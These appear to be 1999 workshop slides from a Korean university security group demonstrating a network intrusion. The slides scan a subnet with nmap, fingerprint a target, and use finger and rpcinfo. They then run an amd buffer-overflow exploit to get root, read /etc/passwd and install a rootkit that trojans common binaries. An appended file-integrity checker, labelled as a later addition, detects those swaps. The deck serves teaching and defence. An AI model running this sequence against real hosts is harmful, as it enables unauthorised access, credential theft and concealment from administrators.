Intrusion demonstration
Part I
Postech
PLUS
Taeho Oh (PLUS015)
ohhara@postech.edu
3rd CONCERT Workshop Nov. 1999
Taeho Oh/PLUS
Contents
• Scan wide area network
– Using a powerful network scanner, nmap
– Find the running hosts in the network
– Gather the host information
• Get root permission from the target host
• Hide himself from the admin
Scan wide area network (1)
• Using a powerful network scanner, nmap
– nmap can do FTP bounce scans, stealth scans, OS prediction, and so on.
– http://www.insecure.org/nmap
Scan wide area network (2)
• Find the running hosts in the network
[ root@ohhara ~ ] {1} # nmap -sP "141.223.xxx.*"
Host (141.223.xxx.0) appears to be up.
Host (141.223.xxx.0) seems to be a subnet broadcast address (returned 111 extra pings). Skipping host.
Host kwxnxoo.postech.ac.kr (141.223.xxx.7) appears to be up.
Host xojx.postech.ac.kr (141.223.xxx.9) appears to be up.
( . . . )
Host victim.postech.ac.kr (141.223.xxx.75) appears to be up.
Host xstxos.postech.ac.kr (141.223.xxx.77) appears to be up.
Host anxelx.postech.ac.kr (141.223.xxx.78) appears to be up.
Host mxrlxns.postech.ac.kr (141.223.xxx.79) appears to be up.
Host (141.223.xxx.99) appears to be up.
Host (141.223.xxx.255) appears to be up.
Host (141.223.xxx.255) seems to be a subnet broadcast address (returned 93 extra pings). Skipping host.
Nmap run completed -- 256 IP addresses (27 hosts up) scanned in 2 seconds
Scan wide area network (3)
• Gather the host information
[ root@ohhara ~ ] {2} # nmap -I -O 141.223.121.75
Interesting ports on victim.postech.ac.kr (141.223.xxx.75):
Port    State   Protocol  Service   Owner
21      open    tcp       ftp       root
23      open    tcp       telnet    root
25      open    tcp       smtp      root
53      open    tcp       domain    root
79      open    tcp       finger    root
80      open    tcp       http      nobody
( . . . )
6000    open    tcp       X11       root

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=2098031 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 2.2.2
Nmap run completed -- 1 IP address (1 host up) scanned in 19 seconds
Scan wide area network (4)
• Gather the host information
[ root@ohhara ~ ] {3} # finger @141.223.xxx.75
[141.223.xxx.75]
Login     Name           Tty  Idle   Login Time     Office  Office Phone
kotaeji   Kim Taehyung   /0   20:46  Oct 27 19:41
[ root@ohhara ~ ] {4} # rpcinfo -p 141.223.xxx.75
   program vers proto   port
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
( . . . )
    100021    1   udp   1026  nlockmgr
    100021    3   udp   1026  nlockmgr
    100021    1   tcp   1024  nlockmgr
    100021    3   tcp   1024  nlockmgr
    300019    1   tcp    878  amd
    300019    1   udp    879  amd
Get root permission from the target host
• Get root with amd buffer overflow exploit
[ root@ohhara ~ ] {5} # ./amd-ex 141.223.xxx.75
Attack 141.223.xxx.75
amq: could not start new autmount point: Connection timed out
Connect to the shell
Linux victim 2.2.5-22 #1 Wed Jun 2 09:17:03 EDT 1999 i686 unknown
uid=0(root) gid=0(root)
id
uid=0(root) gid=0(root)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
( . . . )
Hide himself from the admin
• Install rootkit
[ root@victim ~ ] {1} # tar -xzf ohhara-rootkit.tar.gz
[ root@victim ~ ] {2} # cd ohhara-rootkit
[ root@victim ~/ohhara-rootkit ] {3} # ./install-ohhara-rootkit
• Trojan files of ohhara rootkit
– chgrp, chmod, chown, cp, ln, ls, mkdir, mknod, netstat, ps, touch, dir, du, find, mkfifo, oldps, top, vdir, fixdate, in.inetd, in.smbd, in.telnetd, pam.pwdb.so
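A defender's counterpart to this slide, added here as an example and not part of the original talk: a file-integrity check over the binaries the rootkit replaces, so a trojaned ls or ps is caught by comparing file contents against a baseline kept off the host. Only the file names come from the slide; the directory paths and the names sha256_of, build_baseline, verify and demo are assumptions.

```python
import hashlib
import tempfile
from pathlib import Path

# Binaries the rootkit slide lists as trojaned; the names are the slide's own,
# the directories are assumed (typical late-1990s Linux layout).
ROOTKIT_TARGETS = [
    "bin/chgrp", "bin/chmod", "bin/chown", "bin/cp", "bin/ln", "bin/ls",
    "bin/mkdir", "bin/mknod", "bin/netstat", "bin/ps", "bin/touch",
    "usr/bin/dir", "usr/bin/du", "usr/bin/find", "usr/bin/mkfifo",
    "usr/bin/oldps", "usr/bin/top", "usr/bin/vdir", "usr/bin/fixdate",
    "usr/sbin/in.inetd", "usr/sbin/in.smbd", "usr/sbin/in.telnetd",
    "lib/security/pam.pwdb.so",
]

def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()
def build_baseline(root, targets):
    # Digest per target. Build it from clean install media or right after
    # install and keep it off the host; the checker reads the files directly,
    # so a trojaned ls or ps cannot hide a replaced binary from it.
    baseline = {}
    for rel in targets:
        p = Path(root) / rel
        if p.exists():
            baseline[rel] = sha256_of(p)
    return baseline
def verify(root, baseline):
    # {path: reason} for every baseline entry that no longer matches.
    findings = {}
    for rel, digest in baseline.items():
        p = Path(root) / rel
        if not p.exists():
            findings[rel] = "missing"
        elif sha256_of(p) != digest:
            findings[rel] = "content changed"
    return findings
def demo():
    # Constructed scenario: clean tree, then ls and ps replaced, a daemon removed.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel in ROOTKIT_TARGETS:
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(b"clean " + rel.encode())
        baseline = build_baseline(root, ROOTKIT_TARGETS)
        (root / "bin/ls").write_bytes(b"trojan")  # the swap that hides files
        (root / "bin/ps").write_bytes(b"trojan")  # and the one that hides processes
        (root / "usr/sbin/in.telnetd").unlink()
        return verify(root, baseline)
```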